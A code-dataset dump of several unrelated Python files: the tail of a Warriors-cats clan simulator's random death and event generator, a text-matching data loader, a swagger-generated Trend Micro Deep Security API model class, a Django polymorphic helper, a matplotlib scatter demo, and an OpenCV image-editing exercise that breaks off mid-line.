camp',\n name + ' died after accidentally eating deathberries',\n name +\n ' was killed in their sleep after a snake snuck into camp'\n ])\n if game.clan.current_season == 'Leaf-bare':\n cause_of_death.extend([\n name + ' was found dead in the snow',\n name + ' froze to death in a harsh snowstorm', name +\n ' disappeared from the nursery and was found dead in the territory',\n name +\n ' was playing on the ice when the ice cracked and they drowned'\n ])\n if game.clan.current_season == 'Greenleaf':\n cause_of_death.extend([name + ' died to overheating'])\n elif cat.status == 'apprentice':\n cause_of_death.extend([\n name + ' died in a training accident', name +\n ' was killed by enemy warriors after accidentally wandering over the border',\n name + ' went missing and was found dead',\n name + ' died in a border skirmish'\n ])\n if game.clan.biome == \"Mountainous\":\n cause_of_death.extend([\n name + ' was crushed to death by an avalanche',\n name + ' fell from a cliff and died'\n ])\n if game.clan.biome == \"Beach\":\n cause_of_death.extend([\n name + ' was washed out to sea and drowned',\n name + ' was poisoned by a sea creature and died'\n ])\n elif cat.status == 'warrior' or cat.status == 'deputy':\n if len(game.clan.all_clans) > 0:\n cause_of_death.append(name + ' was found dead near the ' +\n choice(game.clan.all_clans).name +\n 'Clan border')\n cause_of_death.extend([\n name + ' died from infected wounds',\n name + ' went missing and was found dead'\n ])\n if self.at_war:\n cause_of_death.extend([\n name + ' was killed by enemy ' + self.enemy_clan +\n ' warriors', name + ' was killed by enemy ' +\n self.enemy_clan + ' warriors',\n name + ' was killed by enemy ' + self.enemy_clan +\n ' warriors', name + ' died in a border skirmish'\n ])\n if game.clan.biome == \"Mountainous\":\n cause_of_death.extend([\n name + ' was crushed by an avalanche',\n name + ' fell from a cliff and died'\n ])\n if game.clan.biome == \"Beach\":\n cause_of_death.extend([\n name + ' was washed out to sea and drowned',\n name + ' was poisoned by a sea creature and died'\n ])\n if game.clan.biome == \"Plains\":\n cause_of_death.extend([\n name + ' fell into a sinkhole and died', name +\n ' fell into a hidden burrow and could not get out',\n name +\n ' was buried alive when a burrow collapsed on them'\n ])\n #Leader loses a life\n elif cat.status == 'leader':\n cause_of_death = []\n if len(game.clan.all_clans) > 0:\n cause_of_death.extend([\n name + ' lost a live to greencough',\n 'A tree fell in camp and ' + name + ' lost a life'\n ])\n cause_of_death.extend([\n name + ' was found dead near the ' +\n choice(game.clan.all_clans).name +\n 'Clan border mortally injured'\n ])\n cause_of_death.extend([\n name + ' lost a life from infected wounds', name +\n ' went missing and was later found mortally wounded'\n ])\n if self.at_war:\n cause_of_death.extend([\n name + ' was killed by enemy ' + self.enemy_clan +\n ' warriors and lost a life',\n name + ' was killed by enemy ' + self.enemy_clan +\n ' warriors and lost a life',\n name + ' was killed by enemy ' + self.enemy_clan +\n ' warriors and lost a life',\n name + ' lost a life in a border skirmish'\n ])\n if game.clan.biome == \"Mountainous\":\n cause_of_death.extend([\n name + ' lost a life in an avalanche',\n name + ' lost a life in a landslide',\n name + ' was pushed off a cliff and lost a life',\n name + ' accidentally fell off a cliff and lost a life'\n ])\n elif game.clan.biome == \"Beach\":\n cause_of_death.extend([\n name + ' was washed out to sea and lost a life', name +\n ' was poisoned by a sea creature and lost a life'\n ])\n elif game.clan.biome == \"Plains\":\n cause_of_death.extend([\n name + ' fell into a sinkhole and lost a life',\n name + ' fell into a hidden burrow and lost a life',\n name + ' lost a life when a burrow collapsed on them'\n ])\n elif self.at_war:\n cause_of_death.extend([\n name + ' was killed by the ' + self.enemy_clan +\n ' deputy and lost a life',\n name + ' was killed by the ' + self.enemy_clan +\n ' leader and lost a life'\n ])\n\n elif cat.status == 'medicine cat' or cat.status == 'medicine cat apprentice':\n cause_of_death.extend([\n 'The herb stores were damaged and ' + name +\n ' was murdered by an enemy warrior'\n ])\n if self.at_war:\n cause_of_death.extend([\n name + ' was killed by a ' + self.enemy_clan +\n ' warrior while pulling an injured cat out of the battlefield'\n ])\n if cat.status == 'deputy':\n if self.at_war:\n cause_of_death.extend([\n name + ' was killed by the ' + self.enemy_clan +\n ' deputy', name + ' was killed by the ' +\n self.enemy_clan + ' leader'\n ])\n\n if cat.status == 'leader':\n game.clan.leader_lives -= 1\n self.dies(cat)\n\n game.cur_events_list.append(\n choice(cause_of_death) + ' at ' + str(cat.moons) +\n ' moons old')\n\n elif randint(1, 500) == 1: # multiple deaths\n name = str(cat.name)\n other_cat = choice(list(cat_class.all_cats.values()))\n countdown = int(len(cat_class.all_cats) / 3)\n while cat == other_cat or other_cat.dead or other_cat.exiled:\n other_cat = choice(list(cat_class.all_cats.values()))\n countdown-=1\n if countdown <= 0:\n return\n other_name = str(other_cat.name)\n cause_of_death = [\n name + ' and ' + other_name + ' die of greencough',\n name + ' and ' + other_name + ' die of yellowcough',\n name + ' and ' + other_name + ' die of whitecough',\n name + ' and ' + other_name + ' die from eating poisoned prey'\n ]\n if cat.status == ['kitten', 'leader'] or other_cat.status == ['kitten', 'leader']:\n cause_of_death.extend([\n name + ' and ' + other_name +\n ' are killed in a border skirmish',\n name + ' and ' + other_name +\n ' are killed in a battle against a gang of rogues'\n ])\n if cat.mate is not None and cat.age == other_cat.age and other_cat.mate is None:\n if cat.status == 'leader':\n game.clan.leader_lives -= 10\n game.cur_events_list.append(\n name + ' is killed by ' + other_name +\n ' in an argument over ' +\n str(cat_class.all_cats.get(cat.mate).name))\n self.dies(cat)\n return\n if cat.status == 'leader' or other_cat.status == 'leader':\n game.clan.leader_lives -= 1\n game.cur_events_list.append(choice(cause_of_death) + ' and the leader lost a life')\n else:\n game.cur_events_list.append(choice(cause_of_death))\n self.dies(cat)\n self.dies(other_cat)\n\n elif randint(1, 80) == 1: #Death with Personalities\n murder_chance = 20\n name = str(cat.name)\n countdown = int(len(cat_class.all_cats) / 3)\n other_cat = choice(list(cat_class.all_cats.values()))\n while cat == other_cat or other_cat.dead or other_cat.exiled:\n other_cat = choice(list(cat_class.all_cats.values()))\n countdown-=1\n if countdown <= 0:\n return\n other_name = str(other_cat.name)\n if cat.trait in [\n 'bloodthirsty', 'ambitious', 'vengeful', 'sneaky',\n 'sadistic', 'greedy', 'selfish'\n ] and other_cat.status in ['leader', 'deputy']:\n if cat.status == 'deputy' and other_cat.status == 'leader':\n if randint(1, murder_chance - 15) == 1:\n cause_of_death = [\n name + ' murdered ' + other_name +\n ' in cold blood to take their place',\n name + ' murdered ' + other_name +\n ' to take their place and made it look like an accident'\n ]\n game.clan.leader_lives -= 10\n self.dies(other_cat)\n game.cur_events_list.append(\n choice(cause_of_death) + ' at ' +\n str(other_cat.moons) + ' moons old')\n elif cat.status == 'warrior':\n if randint(1, murder_chance - 15) == 1:\n cause_of_death = [\n name + ' murdered ' + other_name +\n ' in cold blood '\n 'in hopes of taking their place',\n name + ' murdered ' + other_name +\n ' in cold blood and made it look accidental '\n 'in hopes of taking their place'\n ]\n if other_cat == 'leader':\n game.clan.leader_lives -= 10\n self.dies(other_cat)\n game.cur_events_list.append(\n choice(cause_of_death) + ' at ' +\n str(other_cat.moons) + ' moons old')\n elif cat.trait in ['bloodthirsty', 'vengeful', 'sadistic']:\n if randint(1, murder_chance) == 1:\n cause_of_death = [\n name + ' murdered ' + other_name + ' in cold blood',\n name + ' murdered ' + other_name +\n ' in cold blood and made it look accidental'\n ]\n if other_cat == 'leader':\n game.clan.leader_lives -= 10\n self.dies(other_cat)\n game.cur_events_list.append(\n choice(cause_of_death) + ' at ' +\n str(other_cat.moons) + ' moons old')\n elif cat.status in [\n 'medicine cat', 'medicine cat apprentice'\n ] and cat.trait in ['bloodthirsty', 'vengeful', 'sadistic']:\n if randint(1, murder_chance) == 1:\n cause_of_death = [\n name + ' killed ' + other_name +\n ' by giving them deathberries', name + ' killed ' +\n other_name + ' by giving them foxglove seeds',\n name + ' killed ' + other_name +\n ' by giving them nightshade berries',\n name + ' killed ' + other_name +\n ' by giving them water hemlock',\n name + ' killed ' + other_name +\n ' by consciously giving them the wrong herbs'\n ]\n if other_cat == 'leader':\n game.clan.leader_lives -= 10\n self.dies(other_cat)\n game.cur_events_list.append(\n choice(cause_of_death) + ' at ' +\n str(other_cat.moons) + ' moons old')\n\n elif cat.moons > randint(150, 200): # extra chance of cat dying to age\n if choice([1, 2, 3, 4, 5, 6]) == 1:\n if cat.status != 'leader':\n self.dies(cat)\n game.cur_events_list.append(\n str(cat.name) +\n ' has passed due to their old age at ' +\n str(cat.moons) + ' moons old')\n else:\n game.clan.leader_lives -= 1\n self.dies(cat)\n game.cur_events_list.append(\n str(cat.name) +\n ' has lost a life due to their old age at ' +\n str(cat.moons) + ' moons old')\n if cat.status == 'leader' and cat.moons > 269:\n game.clan.leader_lives -= 10\n self.dies(cat)\n game.cur_events_list.append(\n str(cat.name) + ' has passed due to their old age at ' +\n str(cat.moons) + ' moons old')\n\n if game.settings.get('disasters') is True:\n alive_count = 0\n alive_cats = []\n for cat in list(cat_class.all_cats.values()):\n if not cat.dead and not cat.exiled and cat.status != 'leader':\n alive_count += 1\n alive_cats.append(cat)\n if alive_count > 10:\n chance = int(alive_count / 10)\n if randint(chance, 1000) == 999:\n disaster = []\n dead_cats = random.sample(alive_cats, 5)\n name1 = str(dead_cats[0].name)\n name2 = str(dead_cats[1].name)\n name3 = str(dead_cats[2].name)\n name4 = str(dead_cats[3].name)\n name5 = str(dead_cats[4].name)\n disaster.extend([\n ' drown after the camp becomes flooded',\n ' are killed in a battle against ' +\n choice(names.normal_prefixes) + 'Clan',\n ' are killed after a fire rages through the camp',\n ' are killed in an ambush by a group of rogues',\n ' go missing in the night',\n ' are killed after a badger attack',\n ' die to a greencough outbreak',\n ' are taken away by twolegs',\n ' eat poisoned freshkill and die'\n ])\n if game.clan.current_season == 'Leaf-bare':\n disaster.extend([\n ' die after freezing from a snowstorm',\n ' starve to death when no prey is found'\n ])\n elif game.clan.current_season == 'Greenleaf':\n disaster.extend([\n ' die after overheating',\n ' die after the water dries up from drought'\n ])\n\n game.cur_events_list.append(name1 + ', ' + name2 + ', ' +\n name3 + ', ' + name4 +\n ', and ' + name5 +\n choice(disaster))\n for cat in dead_cats:\n self.dies(cat)\n\n def dies(self, cat): # This function is called every time a cat dies\n if cat.status == 'leader' and game.clan.leader_lives > 0:\n return\n elif cat.status == 'leader' and game.clan.leader_lives <= 0:\n cat.dead = True\n game.clan.leader_lives = 0\n else:\n cat.dead = True\n\n if cat.mate != None:\n cat.mate = None\n if type(cat.mate) == str:\n mate = cat_class.all_cats.get(cat.mate)\n mate.mate = None\n elif type(cat.mate) == Cat:\n cat.mate.mate = None\n\n for app in cat.apprentice.copy():\n app.update_mentor()\n cat.update_mentor()\n game.clan.add_to_starclan(cat)\n\n def check_age(self, cat):\n if 0 <= cat.moons <= 5:\n cat.age = 'kitten'\n elif 6 <= cat.moons <= 11:\n cat.age = 'adolescent'\n elif 12 <= cat.moons <= 47:\n cat.age = 'young adult'\n elif 48 <= cat.moons <= 95:\n cat.age = 'adult'\n elif 96 <= cat.moons <= 119:\n cat.age = 'senior adult'\n else:\n cat.age = 'elder'\n\nevents_class = Events()","repo_name":"Clangen-Web/clangen-web.github.io","sub_path":"scripts/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":76705,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"71600804647","text":"# -*- coding:utf-8 -*-\n\nimport codecs\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\ndef get_max_length(input_file):\n left_length = []\n right_length = []\n with codecs.open(input_file, 'r', encoding='utf-8_sig') as rfile:\n for line in rfile.readlines():\n data = line.split('\\t')\n left_data = data[0].split()\n left_length.append(len(left_data))\n right_data = data[1].split()\n right_length.append(len(right_data))\n return max(max(left_length), max(right_length))\n\n\ndef get_vocab(input_file):\n vocab = set('pad')\n with codecs.open(input_file, 'r', encoding='utf-8_sig') as rfile:\n for line in rfile.readlines():\n data = line.split('\\t')\n for char in data[0].split():\n vocab.add(char)\n for char in data[1].split():\n vocab.add(char)\n vocab = {word:(i+1) for i, word in enumerate(vocab)}\n vocab['pad'] = 0\n return vocab\n\ndef padding_sentence(data, max_length, vocab):\n sentence = [vocab[word] for word in data.split()]\n if len(sentence) < max_length:\n sentence = sentence + [vocab['pad']]*(max_length-len(sentence))\n elif len(sentence) > max_length:\n sentence = sentence[:max_length]\n return sentence\n\ndef load_data(input_file):\n max_length = get_max_length(input_file)\n vocab = get_vocab(input_file)\n left_data = []\n right_data = []\n label = []\n with codecs.open(input_file, 'r', encoding='utf_8_sig') as rfile:\n for line in rfile.readlines():\n data = line.strip().split('\\t')\n\n left_data.append(padding_sentence(data[0], max_length, vocab))\n right_data.append(padding_sentence(data[1], max_length, vocab))\n if int(data[2]) == 0: label.append([1, 0])\n else: label.append([0, 1])\n x_left_data = np.array(left_data)\n x_right_data = np.array(right_data)\n y_label = np.array(label)\n return x_left_data, x_right_data, y_label, vocab, max_length\n\nif __name__ == '__main__':\n # x_left_data, x_right_data, y_label, vocab, max_length = load_data('data/atec_train_data.txt')\n # print(x_left_data[0])\n # print(y_label[0])\n import tensorflow as tf\n dbpedia = tf.contrib.learn.datasets.load_dataset('dbpedia')\n\n\n\n","repo_name":"zhongbin1/DeepMatching","sub_path":"data_helps.py","file_name":"data_helps.py","file_ext":"py","file_size_in_byte":2296,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"53"}
+{"seq_id":"34423576195","text":"# coding: utf-8\r\n\r\n\"\"\"\r\n Trend Micro Deep Security API\r\n\r\n Copyright 2018 - 2020 Trend Micro Incorporated. Get protected, stay secured, and keep informed with Trend Micro Deep Security's new RESTful API. Access system data and manage security configurations to automate your security workflows and integrate Deep Security into your CI/CD pipeline. # noqa: E501\r\n\r\n OpenAPI spec version: 20.0.186\r\n \r\n Generated by: https://github.com/swagger-api/swagger-codegen.git\r\n\"\"\"\r\n\r\n\r\nimport pprint\r\nimport re # noqa: F401\r\n\r\nimport six\r\n\r\nfrom deepsecurity.models.account_rights import AccountRights # noqa: F401,E501\r\nfrom deepsecurity.models.fix_rights import FixRights # noqa: F401,E501\r\nfrom deepsecurity.models.heap_rights import HeapRights # noqa: F401,E501\r\nfrom deepsecurity.models.license_rate_rights import LicenseRateRights # noqa: F401,E501\r\nfrom deepsecurity.models.network_security_rights import NetworkSecurityRights # noqa: F401,E501\r\nfrom deepsecurity.models.query_rights import QueryRights # noqa: F401,E501\r\nfrom deepsecurity.models.query_traceback_rights import QueryTracebackRights # noqa: F401,E501\r\nfrom deepsecurity.models.server_log_rights import ServerLogRights # noqa: F401,E501\r\nfrom deepsecurity.models.stack_trace_rights import StackTraceRights # noqa: F401,E501\r\n\r\n\r\nclass HostedServiceRights(object):\r\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\r\n\r\n Do not edit the class manually.\r\n \"\"\"\r\n\r\n \"\"\"\r\n Attributes:\r\n swagger_types (dict): The key is attribute name\r\n and the value is attribute type.\r\n attribute_map (dict): The key is attribute name\r\n and the value is json key in definition.\r\n \"\"\"\r\n swagger_types = {\r\n 'account_rights': 'AccountRights',\r\n 'fix_rights': 'FixRights',\r\n 'heap_rights': 'HeapRights',\r\n 'license_rate_rights': 'LicenseRateRights',\r\n 'query_rights': 'QueryRights',\r\n 'query_traceback_rights': 'QueryTracebackRights',\r\n 'server_log_rights': 'ServerLogRights',\r\n 'stack_trace_rights': 'StackTraceRights',\r\n 'network_security_rights': 'NetworkSecurityRights'\r\n }\r\n\r\n attribute_map = {\r\n 'account_rights': 'accountRights',\r\n 'fix_rights': 'fixRights',\r\n 'heap_rights': 'heapRights',\r\n 'license_rate_rights': 'licenseRateRights',\r\n 'query_rights': 'queryRights',\r\n 'query_traceback_rights': 'queryTracebackRights',\r\n 'server_log_rights': 'serverLogRights',\r\n 'stack_trace_rights': 'stackTraceRights',\r\n 'network_security_rights': 'networkSecurityRights'\r\n }\r\n\r\n def __init__(self, account_rights=None, fix_rights=None, heap_rights=None, license_rate_rights=None, query_rights=None, query_traceback_rights=None, server_log_rights=None, stack_trace_rights=None, network_security_rights=None): # noqa: E501\r\n \"\"\"HostedServiceRights - a model defined in Swagger\"\"\" # noqa: E501\r\n\r\n self._account_rights = None\r\n self._fix_rights = None\r\n self._heap_rights = None\r\n self._license_rate_rights = None\r\n self._query_rights = None\r\n self._query_traceback_rights = None\r\n self._server_log_rights = None\r\n self._stack_trace_rights = None\r\n self._network_security_rights = None\r\n self.discriminator = None\r\n\r\n if account_rights is not None:\r\n self.account_rights = account_rights\r\n if fix_rights is not None:\r\n self.fix_rights = fix_rights\r\n if heap_rights is not None:\r\n self.heap_rights = heap_rights\r\n if license_rate_rights is not None:\r\n self.license_rate_rights = license_rate_rights\r\n if query_rights is not None:\r\n self.query_rights = query_rights\r\n if query_traceback_rights is not None:\r\n self.query_traceback_rights = query_traceback_rights\r\n if server_log_rights is not None:\r\n self.server_log_rights = server_log_rights\r\n if stack_trace_rights is not None:\r\n self.stack_trace_rights = stack_trace_rights\r\n if network_security_rights is not None:\r\n self.network_security_rights = network_security_rights\r\n\r\n @property\r\n def account_rights(self):\r\n \"\"\"Gets the account_rights of this HostedServiceRights. # noqa: E501\r\n\r\n Rights related to accounts. # noqa: E501\r\n\r\n :return: The account_rights of this HostedServiceRights. # noqa: E501\r\n :rtype: AccountRights\r\n \"\"\"\r\n return self._account_rights\r\n\r\n @account_rights.setter\r\n def account_rights(self, account_rights):\r\n \"\"\"Sets the account_rights of this HostedServiceRights.\r\n\r\n Rights related to accounts. # noqa: E501\r\n\r\n :param account_rights: The account_rights of this HostedServiceRights. # noqa: E501\r\n :type: AccountRights\r\n \"\"\"\r\n\r\n self._account_rights = account_rights\r\n\r\n @property\r\n def fix_rights(self):\r\n \"\"\"Gets the fix_rights of this HostedServiceRights. # noqa: E501\r\n\r\n Rights related to fixes. # noqa: E501\r\n\r\n :return: The fix_rights of this HostedServiceRights. # noqa: E501\r\n :rtype: FixRights\r\n \"\"\"\r\n return self._fix_rights\r\n\r\n @fix_rights.setter\r\n def fix_rights(self, fix_rights):\r\n \"\"\"Sets the fix_rights of this HostedServiceRights.\r\n\r\n Rights related to fixes. # noqa: E501\r\n\r\n :param fix_rights: The fix_rights of this HostedServiceRights. # noqa: E501\r\n :type: FixRights\r\n \"\"\"\r\n\r\n self._fix_rights = fix_rights\r\n\r\n @property\r\n def heap_rights(self):\r\n \"\"\"Gets the heap_rights of this HostedServiceRights. # noqa: E501\r\n\r\n Rights related to the heap. # noqa: E501\r\n\r\n :return: The heap_rights of this HostedServiceRights. # noqa: E501\r\n :rtype: HeapRights\r\n \"\"\"\r\n return self._heap_rights\r\n\r\n @heap_rights.setter\r\n def heap_rights(self, heap_rights):\r\n \"\"\"Sets the heap_rights of this HostedServiceRights.\r\n\r\n Rights related to the heap. # noqa: E501\r\n\r\n :param heap_rights: The heap_rights of this HostedServiceRights. # noqa: E501\r\n :type: HeapRights\r\n \"\"\"\r\n\r\n self._heap_rights = heap_rights\r\n\r\n @property\r\n def license_rate_rights(self):\r\n \"\"\"Gets the license_rate_rights of this HostedServiceRights. # noqa: E501\r\n\r\n Rights related to license rates. # noqa: E501\r\n\r\n :return: The license_rate_rights of this HostedServiceRights. # noqa: E501\r\n :rtype: LicenseRateRights\r\n \"\"\"\r\n return self._license_rate_rights\r\n\r\n @license_rate_rights.setter\r\n def license_rate_rights(self, license_rate_rights):\r\n \"\"\"Sets the license_rate_rights of this HostedServiceRights.\r\n\r\n Rights related to license rates. # noqa: E501\r\n\r\n :param license_rate_rights: The license_rate_rights of this HostedServiceRights. # noqa: E501\r\n :type: LicenseRateRights\r\n \"\"\"\r\n\r\n self._license_rate_rights = license_rate_rights\r\n\r\n @property\r\n def query_rights(self):\r\n \"\"\"Gets the query_rights of this HostedServiceRights. # noqa: E501\r\n\r\n Rights related to queries. # noqa: E501\r\n\r\n :return: The query_rights of this HostedServiceRights. # noqa: E501\r\n :rtype: QueryRights\r\n \"\"\"\r\n return self._query_rights\r\n\r\n @query_rights.setter\r\n def query_rights(self, query_rights):\r\n \"\"\"Sets the query_rights of this HostedServiceRights.\r\n\r\n Rights related to queries. # noqa: E501\r\n\r\n :param query_rights: The query_rights of this HostedServiceRights. # noqa: E501\r\n :type: QueryRights\r\n \"\"\"\r\n\r\n self._query_rights = query_rights\r\n\r\n @property\r\n def query_traceback_rights(self):\r\n \"\"\"Gets the query_traceback_rights of this HostedServiceRights. # noqa: E501\r\n\r\n Rights related to query traceback. # noqa: E501\r\n\r\n :return: The query_traceback_rights of this HostedServiceRights. # noqa: E501\r\n :rtype: QueryTracebackRights\r\n \"\"\"\r\n return self._query_traceback_rights\r\n\r\n @query_traceback_rights.setter\r\n def query_traceback_rights(self, query_traceback_rights):\r\n \"\"\"Sets the query_traceback_rights of this HostedServiceRights.\r\n\r\n Rights related to query traceback. # noqa: E501\r\n\r\n :param query_traceback_rights: The query_traceback_rights of this HostedServiceRights. # noqa: E501\r\n :type: QueryTracebackRights\r\n \"\"\"\r\n\r\n self._query_traceback_rights = query_traceback_rights\r\n\r\n @property\r\n def server_log_rights(self):\r\n \"\"\"Gets the server_log_rights of this HostedServiceRights. # noqa: E501\r\n\r\n Rights related to server logs. # noqa: E501\r\n\r\n :return: The server_log_rights of this HostedServiceRights. # noqa: E501\r\n :rtype: ServerLogRights\r\n \"\"\"\r\n return self._server_log_rights\r\n\r\n @server_log_rights.setter\r\n def server_log_rights(self, server_log_rights):\r\n \"\"\"Sets the server_log_rights of this HostedServiceRights.\r\n\r\n Rights related to server logs. # noqa: E501\r\n\r\n :param server_log_rights: The server_log_rights of this HostedServiceRights. # noqa: E501\r\n :type: ServerLogRights\r\n \"\"\"\r\n\r\n self._server_log_rights = server_log_rights\r\n\r\n @property\r\n def stack_trace_rights(self):\r\n \"\"\"Gets the stack_trace_rights of this HostedServiceRights. # noqa: E501\r\n\r\n Rights related to stack traces. # noqa: E501\r\n\r\n :return: The stack_trace_rights of this HostedServiceRights. # noqa: E501\r\n :rtype: StackTraceRights\r\n \"\"\"\r\n return self._stack_trace_rights\r\n\r\n @stack_trace_rights.setter\r\n def stack_trace_rights(self, stack_trace_rights):\r\n \"\"\"Sets the stack_trace_rights of this HostedServiceRights.\r\n\r\n Rights related to stack traces. # noqa: E501\r\n\r\n :param stack_trace_rights: The stack_trace_rights of this HostedServiceRights. # noqa: E501\r\n :type: StackTraceRights\r\n \"\"\"\r\n\r\n self._stack_trace_rights = stack_trace_rights\r\n\r\n @property\r\n def network_security_rights(self):\r\n \"\"\"Gets the network_security_rights of this HostedServiceRights. # noqa: E501\r\n\r\n Rights related to Network Security. # noqa: E501\r\n\r\n :return: The network_security_rights of this HostedServiceRights. # noqa: E501\r\n :rtype: NetworkSecurityRights\r\n \"\"\"\r\n return self._network_security_rights\r\n\r\n @network_security_rights.setter\r\n def network_security_rights(self, network_security_rights):\r\n \"\"\"Sets the network_security_rights of this HostedServiceRights.\r\n\r\n Rights related to Network Security. # noqa: E501\r\n\r\n :param network_security_rights: The network_security_rights of this HostedServiceRights. # noqa: E501\r\n :type: NetworkSecurityRights\r\n \"\"\"\r\n\r\n self._network_security_rights = network_security_rights\r\n\r\n def to_dict(self):\r\n \"\"\"Returns the model properties as a dict\"\"\"\r\n result = {}\r\n\r\n for attr, _ in six.iteritems(self.swagger_types):\r\n value = getattr(self, attr)\r\n if isinstance(value, list):\r\n result[attr] = list(map(\r\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\r\n value\r\n ))\r\n elif hasattr(value, \"to_dict\"):\r\n result[attr] = value.to_dict()\r\n elif isinstance(value, dict):\r\n result[attr] = dict(map(\r\n lambda item: (item[0], item[1].to_dict())\r\n if hasattr(item[1], \"to_dict\") else item,\r\n value.items()\r\n ))\r\n else:\r\n result[attr] = value\r\n if issubclass(HostedServiceRights, dict):\r\n for key, value in self.items():\r\n result[key] = value\r\n\r\n return result\r\n\r\n def to_str(self):\r\n \"\"\"Returns the string representation of the model\"\"\"\r\n return pprint.pformat(self.to_dict())\r\n\r\n def __repr__(self):\r\n \"\"\"For `print` and `pprint`\"\"\"\r\n return self.to_str()\r\n\r\n def __eq__(self, other):\r\n \"\"\"Returns true if both objects are equal\"\"\"\r\n if not isinstance(other, HostedServiceRights):\r\n return False\r\n\r\n return self.__dict__ == other.__dict__\r\n\r\n def __ne__(self, other):\r\n \"\"\"Returns true if both objects are not equal\"\"\"\r\n return not self == other\r\n\r\n","repo_name":"DeepSecurityHealthCheck/HealthCheckCore","sub_path":"vendor/SDK/deepsecurity/models/hosted_service_rights.py","file_name":"hosted_service_rights.py","file_ext":"py","file_size_in_byte":12685,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"53"}
+{"seq_id":"17653042890","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import, unicode_literals\n\nfrom collections import namedtuple\n\n\nPolymorphicClassInfo = namedtuple('PolymorphicClassInfo', [\n 'model',\n 'fields',\n])\n\n\ndef get_subclasses(cls):\n \"\"\"\n Recursively creates a list of all subclasses of the provided class.\n \"\"\"\n return cls.__subclasses__() + [sub\n for direct in cls.__subclasses__()\n for sub in get_subclasses(direct)]\n\n\ndef get_polymorphic_field_mapping(cls):\n \"\"\"\n Creates several helper attributes on the serializer and builds a\n mapping of subclasses to the fields included on each.\n \"\"\"\n return {\n subclass.__name__: PolymorphicClassInfo(\n model=subclass,\n fields=[field for field in subclass._meta.local_fields\n if field.serialize and not field.rel])\n for subclass in get_subclasses(cls) + [cls]\n }\n","repo_name":"emergence-lab/emergence-lab","sub_path":"core/polymorphic.py","file_name":"polymorphic.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"10859765347","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n# give us 100 2d values centered at 0\n# X = np.random.randn(100, 2)\n#\n# plt.scatter(X[:,0], X[:,1])\n# plt.show()\n\nX = np.random.randn(200, 2)\n# create clusters of data\n# select all the rows from index 0 to index 50 and add a 3 to all elements\nX[:50] += 3\n\n# this is a 1d array that colors the particular clusters\nY = np.zeros(200)\nY[:50] = 1\n\nplt.scatter(X[:,0], X[:,1], c=Y)\nplt.show()","repo_name":"PikePullen/matplotlib2","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"33333787367","text":"import cv2 as cv\nimport numpy as np\n\nimg1 = cv.imread(\"imagenes/img1.jpg\")\nimg2 = cv.imread(\"imagenes/img2.png\")\ncv.imwrite(\"Resultados/Original_Universe.png\", img1)\ncv.imwrite(\"Resultados/Original_Thanos.png\", img2)\n\n\n#####################################################################\ndef rescale(image, scale=0.5):\n width = int(image.shape[1]*scale)\n height = int(image.shape[0]*scale)\n dimensions = (width, height)\n\n return cv.resize(image, dimensions, interpolation=cv.INTER_AREA)\n\nimg1_rescale = rescale(img1)\nimg2_rescale = rescale(img2)\ncv.imwrite(\"Resultados/Rescaled_Universe.png\",img1_rescale)\ncv.imwrite(\"Resultados/Rescaled_Thanos.png\",img2_rescale)\n\n####################################################################\n\ndef draws1 (image1):\n \n cv.rectangle(image1, (500, 100), (50, 20), (43, 54, 165), thickness=2)\n cv.circle(image1, (530, 60), 50, (255, 64, 255), thickness=-1)\n cv.circle(image1, (500, 200), 80, (112, 10, 30), thickness=2)\n cv.circle(image1, (100, 200), 100, (64, 87, 130), thickness=-1)\n cv.line(image1,(200,0),(600,200),(0,255,0),thickness=10)\n cv.putText(image1, \"This is magnificent\", (100, 200), cv.FONT_HERSHEY_TRIPLEX, 1, (255, 255, 255), 2)\n \n return(image1)\n\ndef draws2(image2):\n cv.rectangle(image2, (500, 540), (200, 400), (43, 54, 165), thickness=cv.FILLED)\n cv.circle(image2, (530, 60), 50, (120, 280, 30), thickness=-1)\n cv.circle(image2, (310, 110), 100, (12, 210, 30), thickness=2)\n cv.circle(image2, (100, 200), 100, (120, 80, 130), thickness=-1)\n cv.line(image2,(600,0),(0,600),(255,255,0),thickness=10)\n cv.putText(image2, \"I AM INEVIBALE\", (230, 480), cv.FONT_HERSHEY_DUPLEX, 1, (255, 255, 255), 2)\n\n \n return(image2)\n\ndraw11 = draws1(img1)\ndraw12 = draws2(img2)\ncv.imwrite(\"Resultados/Draw_Universe.png\", draw11 )\ncv.imwrite(\"Resultados/Draw_Thanos.png\", draw12)\n\n\n####################################################################\ndef ColorScale(image):\n con = cv.cvtColor(image, cv.COLOR_BGR2RGB)\n return(con) \n\ndef grayScale(image):\n con = cv.cvtColor(image, cv.COLOR_BGR2GRAY)\n return(con)\n\ncon_uni = ColorScale(img1)\ncon_tha = ColorScale(img2)\ngray_uni = grayScale(img1)\ngray_tha = grayScale(img2)\n\ncv.imwrite(\"Resultados/Inverted_Universe.png\", con_uni)\ncv.imwrite(\"Resultados/Iverted_Thanos.png\", con_tha)\ncv.imwrite(\"Resultados/Gray_Universe.png\", gray_uni)\ncv.imwrite(\"Resultados/Gray_Thanos.png\", gray_tha)\n######################################################################\n\n#recro = cv.rectangle(img1, (575, 320), (477, 220), (0,0,255), thickness=2)\ndef croped1():\n UniCro = img1[220:320, 477:575]\n return(UniCro)\n\n#recro = cv.rectangle(img2, (230, 10), (400, 225), (0, 0, 255), thickness=2)\ndef croped2():\n ThaCro = img2[10:225, 230:400]\n return(ThaCro)\n\nCropUni =croped1() \nCropTha =croped2()\n\ncv.imwrite(\"Resultados/Croped_Star.png\", CropUni)\ncv.imwrite(\"Resultados/Croped_Thanos.png\", CropTha)\n######################################################################\ndef th(img):\n ret, thresh = cv.threshold(img, 110, 255, cv.THRESH_BINARY)\n return(thresh)\n\nthresh_uni= th(gray_uni)\nthresh_tha = 